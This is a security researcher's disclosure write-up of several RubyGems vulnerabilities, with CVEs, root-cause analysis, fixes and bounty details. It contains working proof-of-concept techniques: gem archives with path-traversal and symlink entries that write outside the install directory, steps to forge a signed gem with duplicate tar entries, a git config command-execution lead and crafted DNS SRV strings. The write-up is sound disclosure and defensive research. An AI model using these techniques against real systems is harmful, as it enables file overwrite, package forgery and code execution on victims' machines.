RubyGems bugs

David Fifield <david@bamsoftware.com>


Some security bugs in RubyGems. Nathan Malkin and I found these when we were working together in Doug Tygar's Fall 2017 CS 294-138 course on penetration testing. Our class presentation covers two of the bugs. Most of these bugs were fixed in RubyGems 2.7.6.

It's a little hard to define what counts as a "bug" in a program like RubyGems, whose whole purpose is to download code and execute it. Even just gem install can run arbitrary malicious code through extconf.rb. (See also.) We therefore looked for things that were unambiguously unexpected: for example even a malicious gem should be safe to simply inspect, as long as you don't try to install or run it.

Ideas for bug hunters

Here are some leads that we didn't fully pursue. They may give you some ideas if you're looking for new bugs.

Git command injection

RubyGems has some kind of support for downloading gems via Git. However, the functionality doesn't appear to be exposed at all(?)—it seems to need an extension to make it work. But Bundler, which is somehow integrated with RubyGems, allows downloading from Git repositories, and it has problems with command line sanitization. For example, try providing --help where Bundler expects a URL:

$ echo "gem 'rack', :git => '--help'" > Gemfile
$ bundler install
Fetching --help
error: unknown option `bare'
usage: git help [--all] [--guides] [--man | --web | --info] [<command>]

    -a, --all             print all available commands
    -g, --guides          print list of useful guides
    -m, --man             show man page
    -w, --web             show manual in web browser
    -i, --info            show info page
Retrying `git clone '--help' "/home/user/.bundle/cache/git/--help-9a8265a5ba2c33881e2717e7581df323a5188174" \
  --bare --no-hardlinks --quiet` due to error (2/4): \
  Bundler::Source::Git::GitCommandError Git error: command \
  `git clone '--help' "/home/user/.bundle/cache/git/--help-9a8265a5ba2c33881e2717e7581df323a5188174" \
  --bare --no-hardlinks --quiet` in directory /home/user/test/git has failed.error: unknown option `bare'

We couldn't find a way to get command execution. A promising direction is setting a configuration option, some of which control command execution, using the -c option. For example,

$ git clone -ccore.sshCommand=date 'ssh://localhost/foo'
Cloning into 'foo'...
/bin/date: extra operand ‘git-upload-pack '/foo'’
Try '/bin/date --help' for more information.
fatal: Could not read from remote repository.

Decompression bomb

RubyGems deals with lots of gzip-compressed data. In some contexts, it handles decompression in a streaming manner, using Zlib::GzipReader; but in others, it tries to decompress completely in memory, using Zlib::Inflate. This potentially makes it vulnerable to decompression bombs. bomb.rb outputs some highly compressed gem files.

$ ulimit -v 1000000
$ ruby bomb.rb
$ ls -lgoh bomb-10000000000.gem
-rw-r--r-- 1 9.3M Nov 13  2017 bomb-10000000000.gem
$ gem spec bomb-10000000000.gem
/usr/lib/ruby/2.3.0/rubygems/package.rb:445:in `read': failed to allocate memory (NoMemoryError)

I tried running my own copy of the rubygems.org code, and uploading such a highly compressed gem to it. There seemed to be some kind of memory or CPU time limiter running by default, though, so it didn't seem to actually do any harm.
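The difference between streaming and in-memory decompression can be made concrete. What follows is a minimal sketch, not RubyGems code: gunzip_limited and DecompressedSizeExceeded are hypothetical names, and the 16 KiB chunk size is an arbitrary choice. It reads through Zlib::GzipReader in fixed-size chunks and gives up once the output passes a caller-chosen limit, so a bomb costs roughly the limit in memory rather than its full expanded size.

```ruby
require "stringio"
require "zlib"

# Hypothetical error class for this sketch.
class DecompressedSizeExceeded < StandardError; end

# Decompress gzip data from io, refusing to produce more than limit bytes.
def gunzip_limited(io, limit, chunk_size = 16 * 1024)
  out = String.new # binary buffer
  gz = Zlib::GzipReader.new(io)
  begin
    # read(n) returns nil once the end of the stream is reached.
    while (chunk = gz.read(chunk_size))
      if out.bytesize + chunk.bytesize > limit
        raise DecompressedSizeExceeded, "more than #{limit} bytes after decompression"
      end
      out << chunk
    end
  ensure
    gz.close
  end
  out
end

# A long run of zero bytes compresses to a tiny fraction of its size.
bomb = Zlib.gzip("\0" * 5_000_000)
begin
  gunzip_limited(StringIO.new(bomb), 1_000_000)
rescue DecompressedSizeExceeded => e
  puts "rejected: #{e.message}"
end
```

Whether a limit like this would be acceptable inside RubyGems depends on how large legitimate metadata can get, which this sketch does not try to answer.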

Stub specification parsing

Gem metadata is usually stored as YAML in the file metadata.gz inside the gem tar container. But after being installed, a subset of the metadata is redundantly stored in a stub specification, a formatted comment at the top of the specifications/*.gemspec YAML file. Its purpose (I think) is to be faster to parse than the entire gemspec, for common operations where only part of the metadata is needed. Of course having two sources for the same data carries the risk that they will get out of sync. A stub specification looks like this:

# stub: tzinfo 1.2.3 ruby lib

The four parts are, in order: name, version, platform, and require_path. The parts are parsed by splitting on whitespace.

A strange thing happens if a gem file happens to have a version number that is an empty string (as in #270068 below): the stub will look like this:

# stub: tzinfo  ruby lib

Because the stub is parsed by splitting on whitespace, this gets misparsed as version="ruby", platform="lib". This bug led to a crash in all gem commands, once a single stub with an empty version had been installed. The fix for the crash, though, is clearly wrong. Here is the pre-fix code, in pseudocode:

parts = stub.split(" ")
name = parts[0]
version = parts[1]
platform = parts[2]
require_path = parts.last

The fix changes it to this:

parts = stub.split(" ")
name = parts[0]
if parts[1] parses as a version number:
    version = parts[1]
else:
    version = "0"
platform = parts[2] # BUG
require_path = parts.last

They didn't shift the following assignment to account for the missing version number. It should rather be:

parts = stub.split(" ")
name = parts[0]
if parts[1] parses as a version number:
    version = parts[1]
    platform = parts[2]
    require_path = parts.last
else:
    version = "0"
    platform = parts[1]
    require_path = parts.last

The upshot is that you end up with platform being set to some controllable string (what should be treated as require_path), and different from what's stored in the YAML.
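The two pseudocode variants can be written out in Ruby to see the difference on the empty-version stub. This is a sketch that follows the pseudocode above rather than the actual RubyGems source; the function names are made up for illustration, and Gem::Version.correct? stands in for "parses as a version number".

```ruby
require "rubygems"

# Behavior after the fix, as described in the pseudocode: the version falls
# back to "0", but platform is still read from index 2.
def parse_stub_after_fix(line)
  parts = line.sub(/\A# stub: /, "").split(" ")
  version = Gem::Version.correct?(parts[1]) ? parts[1] : "0"
  { name: parts[0], version: version, platform: parts[2], require_path: parts.last }
end

# Variant that shifts platform left when the version field is missing.
def parse_stub_shifted(line)
  parts = line.sub(/\A# stub: /, "").split(" ")
  if Gem::Version.correct?(parts[1])
    version = parts[1]
    platform = parts[2]
  else
    version = "0"
    platform = parts[1]
  end
  { name: parts[0], version: version, platform: platform, require_path: parts.last }
end

stub = "# stub: tzinfo  ruby lib" # empty version field
p parse_stub_after_fix(stub) # platform comes out as "lib"
p parse_stub_shifted(stub)   # platform comes out as "ruby"
```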

RubyGems.org username/user ID confusion

Users at rubygems.org are identified by both a numeric user ID and a username. For example, both of these point to the same user:

The only thing separating user IDs and usernames is their syntax: user IDs must start with a digit, and usernames must not. Throughout the code, both forms of identification are mostly interchangeable, returning results if either the user ID or the username matches. If you could subvert the username checks, and create an account with a numeric username, it would be interpreted on the server as a user ID, and you could probably gain the privileges of another user.

SRV interference with s3 URLs

Update: whatever vulnerabilities may have existed with SRV lookups disappeared when SRV lookups were removed in October 2018. See RubyGems news. It turns out that file URLs were vulnerable.

The gem command issues a DNS SRV query, the response to which may override the URL from which gems are downloaded. The dodginess of the feature and the fragility of its verification are described more here. I could not find a serious, plausible vulnerability in the code with respect to http or https URLs, partly because the overridden host component has to be a subdomain of the original domain. But gem also supports s3 URLs and with those I made more progress.

The observations in this section are based on the code as of commit 7a49f405dd.

A user who has configured an s3 source probably has configured their .gemrc like this:

# https://github.com/rubygems/rubygems/pull/1134
:sources:
- s3://mybucket/
s3_source: {
  mybucket: {
    id: "my_id",
    secret: "my_secret"
  }
}

With such a configuration, gems will not be fetched from the default https://rubygems.org/gems/, but from https://mybucket.s3.amazonaws.com/gems/. The funny thing is, gem will do the DNS SRV thing even when using an s3 source. Instead of _rubygems._tcp.rubygems.org, the DNS SRV query will be for _rubygems._tcp.mybucket. Suppose the response is not.mybucket: it passes the subdomain check, and the constructed URL will be https://not.mybucket.s3.amazonaws.com/gems/. The not.mybucket bucket may be owned by a completely different user (i.e., an attacker) than the expected mybucket bucket. On its own, this doesn't work, because there are no credentials for not.mybucket in .gemrc (the error message is "no key for host not.mybucket in s3_source in .gemrc"). We can work around that by providing the credentials in the URL: the DNS SRV response should be attackerusername:attackerpassword@not.mybucket.
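To see why the crafted SRV response gets through, here is a small sketch. It assumes the subdomain check has the form quoted in the April 2017 entry of the api_endpoint timeline later in this document; I have not re-verified that against commit 7a49f405dd, and srv_target_allowed? is a name invented for this example.

```ruby
require "uri"

# Assumed form of the subdomain check: parse the SRV target as if it were the
# authority part of a URL and compare only the host component.
def srv_target_allowed?(target, host)
  URI("http://" + target).host.end_with?(".#{host}")
end

target = "attackerusername:attackerpassword@not.mybucket"
parsed = URI("http://" + target)

puts srv_target_allowed?(target, "mybucket") # the check looks only at the host
puts parsed.host                             # host component seen by the check
puts parsed.userinfo                         # credentials ride along unchecked
```

The host component is not.mybucket, which ends in .mybucket, so the check passes even though the target also smuggles in a userinfo component.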

This is so, so close to being a working exploit. There's just one problem: the wildcard certificate for *.s3.amazonaws.com doesn't match the double subdomain. If you try it, gem fails with the error "SSL_connect returned=1 errno=0 state=error: certificate verify failed (certificate rejected)". I tried also setting :ssl_verify_mode: 0 in .gemrc, but that doesn't seem to affect this particular request.

The AWS documentation says that bucket names containing a dot don't work with HTTPS: "When using virtual hosted–style buckets with SSL, the SSL wild card certificate only matches buckets that do not contain periods." But that's really the only thing preventing hijacking of s3 fetches. If gem were ever modified to use the alternative style of URL, https://s3.amazonaws.com/mybucket/gems/, it would become vulnerable.

I suspect that a sufficient fix for this is to disable the DNS SRV thing for s3 sources. s3 bucket names don't have the same ownership relationship as subdomains.

Installer can modify other gems if gem name is specially crafted

This is a fairly weak vulnerability, a limited file overwrite. It takes advantage of the code incorrectly using string prefix comparison to determine subdirectory containment. If you can convince someone to install a gem file whose name is a prefix of some other important gem file, you can overwrite that other important gem file. This vulnerability was assigned CVE-2018-1000079. It is reminiscent of, but weaker than, report #243156 by Yusuke Endoh, which could overwrite any gem file regardless of name.

There's a small bug in the report: it says that deleting an existing gem could lead to code execution. The other two things could lead to code execution, but just deleting a gem would not.

The fix f83f911e19 went into RubyGems 2.7.6. It just appends a '/' before doing the string prefix check, as we suggested. (Maybe it would have been better to use File::SEPARATOR instead?)


The install_location function allows writing to certain files outside the installation directory.

The install_location function in lib/rubygems/package.rb attempts to ensure that files are not installed outside destination_dir. However the test it employs, a string comparison using start_with?, fails to prevent the case when destination_dir is a prefix of the path being written.

Example that should be prevented but is allowed:

install_location '../install-whatever-foobar/hello.txt', '/tmp/install'
# outputs '/tmp/install-whatever-foobar/hello.txt'

gem install always constructs destination_dir as '#{name}-#{version}', so the vulnerability cannot overwrite arbitrary files. However, a malicious gem with name='rails' and an empty version number (version=''), for example, could overwrite the files of any other gem whose name begins with rails-, like rails-i18n or rails-letsencrypt.
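The flaw is easy to reproduce in isolation. The sketch below is a simplified model of the containment test, not the full install_location function; the helper names are hypothetical, and it assumes POSIX-style paths and an absolute, already-normalized destination_dir. The /tmp/install/gems/ layout in the second example is what gem install --install-dir=/tmp/install would produce.

```ruby
# Containment test by plain string prefix, as in the vulnerable code.
def naive_contained?(destination_dir, filename)
  destination = File.expand_path(File.join(destination_dir, filename))
  destination.start_with?(destination_dir)
end

# Same test, but with a directory separator appended to the prefix.
def separator_contained?(destination_dir, filename)
  destination = File.expand_path(File.join(destination_dir, filename))
  destination.start_with?(destination_dir + "/")
end

cases = [
  ["/tmp/install", "lib/hello.rb"],
  ["/tmp/install", "../install-whatever-foobar/hello.txt"],
  # name='rails', version='' gives a destination_dir ending in "rails-"
  ["/tmp/install/gems/rails-", "../rails-i18n-5.0.4/lib/rails_i18n.rb"],
]

cases.each do |dir, file|
  puts "#{dir} + #{file}: naive=#{naive_contained?(dir, file)} " \
       "with_separator=#{separator_contained?(dir, file)}"
end
```

Only the first case is accepted by both tests; the other two pass the naive prefix test and are rejected once the separator is appended.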

Proof of concept

The attached ra.gem demonstrates the vulnerability. It assumes that some other gems have already been installed.

gem install --install-dir=/tmp/install rails-i18n rails-letsencrypt rails-html-sanitizer
gem install --install-dir=/tmp/install ra.gem

The malicious gem will do three things, each of which could potentially lead to code execution:

The structure of the gem file reveals how the attack works:

$ tar -xvf ra.gem
metadata.gz
data.tar.gz
$ gzip -dc metadata.gz | head -n 4
--- !ruby/object:Gem::Specification
name: rails
version: !ruby/object:Gem::Version
  version: ''
$ tar -tvf data.tar.gz
-rw-r--r-- 0/0              12 1969-12-31 16:00 README
drwxr-xr-x 0/0               0 1969-12-31 16:00 ../rails-letsencrypt-0.5.3/
-rw-r--r-- 0/0              12 1969-12-31 16:00 ../rails-i18n-5.0.4/lib/rails_i18n.rb
lrw-r--r-- 0/0               0 1969-12-31 16:00 ../rails-html-sanitizer-1.0.3 -> /tmp/attacker-controlled

Remediation

A sufficient fix is to append a directory separator to destination_dir before doing the start_with? check.

diff --git a/lib/rubygems/package.rb b/lib/rubygems/package.rb
index c36e71d8..f73f9d30 100644
--- a/lib/rubygems/package.rb
+++ b/lib/rubygems/package.rb
@@ -424,7 +424,7 @@ EOM
     destination = File.expand_path destination

     raise Gem::Package::PathError.new(destination, destination_dir) unless
-      destination.start_with? destination_dir
+      destination.start_with? destination_dir + '/'

     destination.untaint
     destination

Attached files

Unpacker improperly validates symlinks, allowing gems to write to arbitrary locations

Using a symbolic link that points outside of the install directory, a gem could overwrite any named file with arbitrary contents. The attack is simple to execute but powerful: it allows overwriting arbitrary files as root. But then again, if you can convince someone to install any malicious gem file, you can get root trivially, no symlink tricks required. So what makes this vulnerability special? Just that it affects even gem unpack: even trying to inspect the gem file is dangerous, even if you don't install or run it. This vulnerability was assigned CVE-2018-1000073.

It turns out GNU tar had this exact same bug way back in 1998 (CVE-2002-1216):

tar "features" from Willy Tarreau
lrwxrwxrwx willy/users       0 Sep 21 11:34 1998 include -> /etc
-rw-r--r-- willy/users     758 Sep 21 11:40 1998 include/profile

The commits 1b931fc03b and 666ef793ca, part of RubyGems 2.7.6, attempt to fix this vulnerability. If you ask me, the fix is unsatisfying. It uses File::realpath, just like the old code, which is good as far as it goes, but for old versions of Ruby without realpath it just silently falls back to the old vulnerable code. They also use string operations (start_with?) to try and determine subdirectory containment, which is exactly what led to #270068. There may still be vulnerabilities here.


The RubyGems installer attempts to prevent a gem from writing any files outside the install directory; however it is possible to bypass the check with a symbolic link in a crafted gem.

Example structure of malicious gem

$ tar -xvf symlink.gem
metadata.gz
data.tar.gz
$ tar -tvf data.tar.gz
-rw-r--r-- 0/0              12 1969-12-31 16:00 README
lrw-r--r-- 0/0               0 1969-12-31 16:00 link -> /tmp
-rw-r--r-- 0/0               6 1969-12-31 16:00 link/HACKED

Proof of concept

Using the attached symlink.gem:

gem install symlink.gem
# or
gem unpack symlink.gem

This will create a file /tmp/HACKED.

Impact

The name and contents of the written file, as well as the file permissions, are arbitrary. Using this technique, an attacker could easily get code execution, for example by overwriting a system binary or writing into a user's .profile.

Note that the exploit will even work with gem unpack, which is supposed to be free of system-level side effects.

For comparison, this exploit is more powerful than #243156 (and #270068) as the target directory doesn't need to contain a dash.

Root cause

The code in install_location is supposed to check if the target filename is outside the destination directory. It does this by fully resolving (using File.realpath) the destination directory and then seeing if the target filename starts with that directory.

This test succeeds for a symlink that points outside the gem's install directory, because its "destination directory" is the directory where it's located (not where it points), which is local.

The test also succeeds for a file that uses the symlink to "escape" the local directory, because the symlink really is its prefix.

However, in combination, these files can allow for arbitrary writes, as shown.
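The combination can be reproduced safely inside a temporary directory. The sketch below is illustrative only: resolves_inside? is a hypothetical check, not the RubyGems code, and it assumes a platform with symlink support and that the parent directory of the target already exists. It contrasts a string-prefix test on the unresolved path with a test that resolves the parent directory first.

```ruby
require "fileutils"
require "tmpdir"

# Hypothetical check: resolve the directory that would receive the file and
# require it to be the destination directory or something beneath it.
def resolves_inside?(destination_dir, relative_path)
  root = File.realpath(destination_dir)
  parent = File.realpath(File.dirname(File.join(root, relative_path)))
  parent == root || parent.start_with?(root + File::SEPARATOR)
end

def symlink_demo
  Dir.mktmpdir do |tmp|
    dest = File.join(tmp, "dest")
    outside = File.join(tmp, "outside")
    FileUtils.mkdir_p([dest, outside])
    # Plays the role of "link -> /tmp" in the malicious gem.
    File.symlink(outside, File.join(dest, "link"))

    {
      # The unresolved path really does start with the destination directory.
      string_prefix_check_passes: File.join(dest, "link/HACKED").start_with?(dest + "/"),
      readme_inside: resolves_inside?(dest, "README"),
      hacked_inside: resolves_inside?(dest, "link/HACKED"),
    }
  end
end

p symlink_demo
```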

The root cause vulnerability is the ability of symlinks to point outside the gem. This was actually forbidden in a commit from 2015, but was made more permissive in a later commit, creating this vulnerability.

Suggested remediation

The course of action we recommend is to (again) disallow symlinks that point outside the gem directory.

Attached files

api_endpoint allows URI syntax in DNS SRV response

Update: RubyGems removed SRV lookups in October 2018, removing this class of vulnerability. See RubyGems news. This bug report was about http and https URLs; see also the impact on s3 URLs and file URLs.

RubyGems has had a funny and little-known feature of making a DNS SRV request to find an alternate download server other than the default api.rubygems.org. As you might expect, seeing as a local attacker can spoof SRV responses, such a feature is hard to make secure. Despite past vulnerabilities and resultant additional security checks, we found new ways to mess with the address that a client connects to, though none that obviously leads to code execution.

The relevant piece of code has a long history of security vulnerabilities:

March 2012
      URI.parse "#{res.target}#{uri.path}"

Adds the feature to do a SRV lookup to check for an alternative API hostname. The stated rationale is that the feature "allows for the usage of short, simple source names (like https://rubygems.org) with specific api endpoint names, which improves load balancing." There are no security checks in this version: anyone who can spoof a SRV response can get you to download gems from their chosen location. The feature first appears in RubyGems 2.0.

May 2015
      target = res.target.to_s.strip

      if /#{host}\z/ =~ target
        return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
      end

Jonathan Claudius reports (HackerOne) the DNS spoofing vulnerability, which becomes CVE-2015-3900. The intended fix was that the DNS reply should be restricted to being a subdomain of the original requested domain; e.g. "rubygems.org" is allowed to become "api.rubygems.org", but not to become "evil.hacker.example". The first attempt at a fix used a regular expression, /#{host}\z/, to try to ensure that the SRV response ends with the original hostname. This change went into RubyGems 2.4.7.

      target = res.target.to_s.strip

      if /\.#{Regexp.quote(host)}\z/ =~ target
        return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
      end

But the regular expression fix was incomplete: not only did it allow "rubygems.org" to become "evilrubygems.org", it also allowed an attacker to control regular expression metacharacters and therefore match almost anything. This was CVE-2015-4020. A followup fix changed the regular expression to /\.#{Regexp.quote(host)}\z/, which ensures that there's a dot before the domain, and escapes metacharacters. This further fix went into RubyGems 2.4.8 in June 2015. However, the code remained vulnerable to a slightly modified attack.

April 2017
      target = res.target.to_s.strip

      if URI("http://" + target).host.end_with?(".#{host}")
        return URI.parse "#{uri.scheme}://#{target}#{uri.path}"
      end

Jonathan Claudius reported a problem with the regular expression fix. The regular expression /\.#{Regexp.quote(host)}\z/ is fine for making sure that a hostname ends with a dot and then host. But the problem was that the string was not treated purely as a hostname; it was pasted into the middle of a string that was then parsed as a URL. An attacker could return a string like "evil.hacker.example/api.rubygems.org", which would pass the check because it ends in ".rubygems.org", but would be parsed into the URL "https://evil.hacker.example/api.rubygems.org". This vulnerability was CVE-2017-0902.

The developers' reaction was to take the SRV response, parse it as a URL, extract the host component, and compare that against the expected host. The fix shipped four months later in RubyGems 2.6.13. (It was while looking at this particular fix, and the others in 2.6.13, that I realized there were likely more bugs lurking in RubyGems.)

October 2017

That brings us to this report. The fix from 2.6.13 still has some weird properties. After validating the host, the code pastes the entire SRV response (not just the host part that it had validated) into the middle of a URL string. This means that an attacker can freely control the path, query, fragment, etc. components.

October 2018

RubyGems removes the SRV lookup feature.

Here is the message I sent to security@rubygems.org:

I was looking at commit 8d91516fb7037ecfb27622f605dc40245e0f8d32, which was the fix for the DNS hijacking issue CVE-2017-0902. The function still handles the DNS response in a potentially unsafe way. I did not find any actual vulnerabilities in the current code; the code that uses the result of api_endpoint (perhaps coincidentally) discards the potentially malicious components of the URI that api_endpoint returns. But future code may be vulnerable. I'm sending this to the security list because my checks for vulnerability may be incomplete.

The problem is that api_endpoint allows the DNS SRV response to contain URI-like syntax (which was the cause of CVE-2017-0902). The fix was to parse the syntax as if it were a URI, extract the host component, and only do a comparison using the host component, rather than the entire string. However, the entire string is still pasted into the return value, assuming the comparison succeeds. It can contain URI syntax characters like ? and # that change the interpretation of what follows them.

I'm attaching a patch that adds a new test and changes api_endpoint to discard everything but the host after parsing the DNS SRV response as a URI. It would probably be even better simply to disallow any syntax other than hostname literals.

The lines that I initially thought were vulnerable, but appear not to be, are in lib/rubygems/source.rb:

The reason they are not vulnerable is that api_uri is a URI object rather than a string, so the + operator is actually the merge method rather than string concatenation. The merge operator replaces any existing path, query, and fragment components, it seems. (It would not help if the attacker-provided string changed the URI's host, pass, or port components, but I could not think of a realistic path to exploitation using only those components.) However if api_uri had been coerced into a string, then the code would be vulnerable. An attacker could cause the client to download some other path, which could possibly lead to a downgrade attack or replacing one gem with another.

And here is the commit log for the included patch, which was lost when the report got turned into a pull request:

The api_endpoint function inserts an untrusted string into the middle of a URI:

URI.parse "#{uri.scheme}://#{target}#{uri.path}"

The intention is that target only replaces the host component of the URI; for example if uri.scheme = "https" and uri.path = "/path", and target = "example.com", then the result will be

https://example.com/path

But target could contain other URI syntax that masks uri.path. For example, if target = "example.com/badpath?query=", then the result will be

https://example.com/badpath?query=/path

If target = "example.com/badpath#fragment", then the result will be

https://example.com/badpath#fragment/path

Additionally, target = "example.com:9999" could change the port:

https://example.com:9999/path

or target = "user:pass@example.com" could change credentials:

https://user:pass@example.com/path

Returning a URI with an attacker-controlled path/query/fragment is potentially dangerous if used directly or if other URIs are created from it using string concatenation. For example, if api_endpoint returns "https://example.com/malicious.gz#", and some other code tries to create a new URI by appending "/good.gz", then the resulting URI will be https://example.com/malicious.gz#/good.gz, with the intended path being hidden in the fragment component of the URI. However, I did not find any places in the code where this happens; code that on first glance looks vulnerable:

    spec_path  = api_uri + "#{file_name}.gz"

is actually safe because the + is not string concatenation, but the merge method of URI::Generic. It is still possible to replace the user, password, and port, but those do not offer an obvious path to exploitation.

Probably it's better not to parse target as a URI at all; rather to insist that it have the form of a hostname only.

Commit 8d91516fb7037ecfb27622f605dc40245e0f8d32 began parsing target as a URI in order to compare the host component as a fix for CVE-2017-0902; however it does not discard components other than the host when building the result.
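The URI behavior described in the commit log can be checked directly with Ruby's uri library. This is a small sketch: build_endpoint is a stand-in name for the string interpolation quoted above, not a function in RubyGems.

```ruby
require "uri"

# Stand-in for the interpolation in api_endpoint.
def build_endpoint(scheme, target, path)
  URI.parse("#{scheme}://#{target}#{path}")
end

targets = [
  "example.com",
  "example.com/badpath?query=",
  "example.com/badpath#fragment",
  "example.com:9999",
  "user:pass@example.com",
]

targets.each do |target|
  u = build_endpoint("https", target, "/path")
  puts "#{target.inspect}: host=#{u.host} port=#{u.port} userinfo=#{u.userinfo.inspect} " \
       "path=#{u.path} query=#{u.query.inspect} fragment=#{u.fragment.inspect}"
end

# URI#+ is merge, so the attacker's path and fragment are replaced...
base = URI.parse("https://example.com/malicious.gz#")
puts((base + "good.gz").to_s)

# ...whereas string concatenation hides the intended path in the fragment.
puts(base.to_s + "/good.gz")
```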

Gem signature forgery using duplicate filenames

RubyGems supports developer signatures on gem files. Signatures for the various components of a gem are stored alongside them, directly inside the gem tar container. Ambiguous processing of multiple tar entries with the same filename enabled transferring any existing legitimate signature onto arbitrary contents.

It turns out that, in practice, essentially no developers actually sign their gems. A minor challenge in preparing the report was finding a gem—any gem—with a valid and current signature. Even if developers signed their gems, the default client behavior is not to verify signatures.

The fix f5042b8792 went into RubyGems 2.7.6. All it does is disallow duplicate filenames in a tar file, which seems to be sufficient. For some reason they didn't take our patch that adds tests. The fix is only partial: while it's no longer possible to attach someone else's signature to your own contents, you can still mix and match signed data and metadata files.

This vulnerability was assigned CVE-2018-1000076. Our report got us a $1000 bounty.


Summary

Inconsistencies in how gem processes gem files make it possible to reuse a signature from an existing signed gem and apply it to arbitrary contents. The forged gem will install even with -P HighSecurity.

The attached file multi_json-1.12.2.gem is a forged version of the genuine multi_json-1.12.2.gem gem with faked contents (just a single text file called HACKED). Here is how to check it. You must first trust the original developer's public key.

$ gem --version
2.5.2
$ wget https://raw.githubusercontent.com/intridea/multi_json/master/certs/rwz.pem
$ gem cert --add rwz.pem
Added '/CN=pavel/DC=pravosud/DC=com'
$ gem install --install-dir install -P HighSecurity multi_json-1.12.2.gem
Successfully installed multi_json-1.12.2
1 gem installed
$ ls install/gems/multi_json-1.12.2/
HACKED

Details

The vulnerability stems from inconsistencies in how gem interprets the entries of the tar container. A tar file may contain multiple entries with the same name. When there are two data.tar.gz entries, for example, gem will honor the second one when verifying the signature, but the first one when installing files. The proof of concept gem uses this trick: it prepends an additional data.tar.gz entry to the genuine multi_json-1.12.2.gem. (The attached forge-gem.sh script was used to make it.)

$ tar tvf multi_json-1.12.2.gem
-r--r--r-- wheel/wheel     163 2017-10-05 16:05 data.tar.gz
-r--r--r-- wheel/wheel    1840 2017-09-04 21:51 metadata.gz
-r--r--r-- wheel/wheel     256 2017-09-04 21:51 metadata.gz.sig
-r--r--r-- wheel/wheel   16908 2017-09-04 21:51 data.tar.gz
-r--r--r-- wheel/wheel     256 2017-09-04 21:51 data.tar.gz.sig
-r--r--r-- wheel/wheel     270 2017-09-04 21:51 checksums.yaml.gz
-r--r--r-- wheel/wheel     256 2017-09-04 21:51 checksums.yaml.gz.sig

A similar bug affects checksums.yaml.gz: checksums are read from the first such entry, while the signature is verified on the last. This table summarizes the inconsistencies:

file               extract_files uses  verify uses
data.tar.gz        first               last
checksums.yaml.gz  first               last
metadata.gz        last                last

Source code references

Here are the pieces of code that are responsible for the inconsistencies in processing.

extract_files takes the first data.tar.gz entry:

  def extract_files destination_dir, pattern = "*"
    verify unless @spec

    FileUtils.mkdir_p destination_dir

    @gem.with_read_io do |io|
      reader = Gem::Package::TarReader.new io

      reader.each do |entry|
        next unless entry.full_name == 'data.tar.gz'

        extract_tar_gz entry, destination_dir, pattern

        return # ignore further entries
      end
    end
  end

read_checksums seeks to the first checksums.yaml.gz entry:

  def read_checksums gem
    Gem.load_yaml

    @checksums = gem.seek 'checksums.yaml.gz' do |entry|
      Zlib::GzipReader.wrap entry do |gz_io|
        YAML.load gz_io.read
      end
    end
  end

verify_files and verify_entry iterate over all entries in the tar file, filling in @signatures and @digests. In the case of entries with duplicate names, it overwrites previous values, meaning that the last result wins. verify_entry also handles metadata.gz, calling load_spec afresh each time:

  def verify_entry entry
    file_name = entry.full_name
    @files << file_name

    case file_name
    when /\.sig$/ then
      @signatures[$`] = entry.read if @security_policy
      return
    else
      digest entry
    end

    case file_name
    when /^metadata(.gz)?$/ then
      load_spec entry
    when 'data.tar.gz' then
      verify_gz entry
    end
  rescue => e
    message = "package is corrupt, exception while verifying: " +
              "#{e.message} (#{e.class})"
    raise Gem::Package::FormatError.new message, @gem
  end

verify_checksums and verify_signatures operate only on the precomputed @checksums, @signatures, and @digests.

Incidentally, get_metadata, used by the unpack command, has its own extractor for metadata.gz, but it happens to grab the last entry, just like verify_files.

Mitigation

The attached patch 0001-Add-tests-that-Gem-Package-verify-checks-duplicate-f.patch adds two new tests (both currently failing) that check signature verification when bogus files come before or after the genuine files.

The essential mitigation is to ensure that there is no ambiguity when processing a tar file that has multiple entries for the same file name. E.g., "data.tar.gz" must refer to one and only one entry in the tar file. One way to do it would be to set a policy in the code: e.g., last entry always wins (which would be consistent with the tar command). But that would be hard to enforce, especially in new code going forward. Another way would be not to permit duplicate entries; e.g., verify_entry could check whenever it is about to overwrite something in @signatures, @digests, or @spec, and return an error. This needs some care, as metadata and metadata.gz are both processed equivalently. It is possible, using symlinks, to create entries that effectively point to the same file, even though the paths differ; e.g.:

data.tar.gz
dir/ -> ..
dir/data.tar.gz

But this shouldn't be a problem for gem, as long as it continues to use strict string equality with unadorned paths like "data.tar.gz".
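A toy model may help show both the ambiguity and the "no duplicates" policy. It represents the tar container as an ordered list of name/contents pairs; it does not use Gem::Package, and all names here are hypothetical.

```ruby
# Ordered entries, as in the proof-of-concept gem: a forged data.tar.gz is
# placed before the genuine one.
ENTRIES = [
  ["data.tar.gz", "forged contents"],
  ["metadata.gz", "genuine metadata"],
  ["data.tar.gz", "genuine contents"],
].freeze

# "First wins": stop at the first matching entry.
def first_entry(entries, name)
  pair = entries.find { |entry_name, _| entry_name == name }
  pair && pair[1]
end

# "Last wins": later pairs overwrite earlier ones when building the hash.
def last_entry(entries, name)
  entries.to_h[name]
end

# Names that occur more than once; a strict reader would reject the file
# if this list is non-empty.
def duplicate_names(entries)
  entries.map(&:first).group_by(&:itself).select { |_, names| names.size > 1 }.keys
end

puts "installed: #{first_entry(ENTRIES, 'data.tar.gz')}"
puts "verified:  #{last_entry(ENTRIES, 'data.tar.gz')}"
puts "duplicates: #{duplicate_names(ENTRIES).inspect}"
```

The installer-style lookup and the verifier-style lookup disagree about what data.tar.gz is, which is the whole attack; rejecting any container with a non-empty duplicate list removes the disagreement.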

Even when this bug is fixed, a weaker form of signature forgery is possible. There is nothing in a gem file that binds data.tar.gz and metadata.gz together: they are signed independently. It is possible to mix and match files from different signed gems. Suppose a signed gem example-1.0 has a security vulnerability, and the authors release a new signed update example-1.1. Someone (perhaps a malicious rubygems.org admin) could forge a gem containing data.tar.gz from example-1.0 and metadata.gz from example-1.1. Users would think they are running the updated code, but they are still running the old vulnerable code. Fixing this weaker form of forgery seems like it would require a redesign of the signature format. Ideally, the signature would be over the entire gem, and verified before any unpacking.

It seems that not many people sign their gems or verify signatures. For most users the possibility of signature forgery doesn't put them at additional risk beyond the (already risky) status quo. The flaw affects only those users who use the MediumSecurity or HighSecurity profiles.

Attachments

How to run forge-gem.sh:

$ gem fetch multi_json
$ mkdir orig
$ mv multi_json-1.12.2.gem orig/
$ echo hacked > HACKED
$ tar czf data.tar.gz HACKED
$ ./forge-gem.sh orig/multi_json-1.12.2.gem data.tar.gz forged.gem

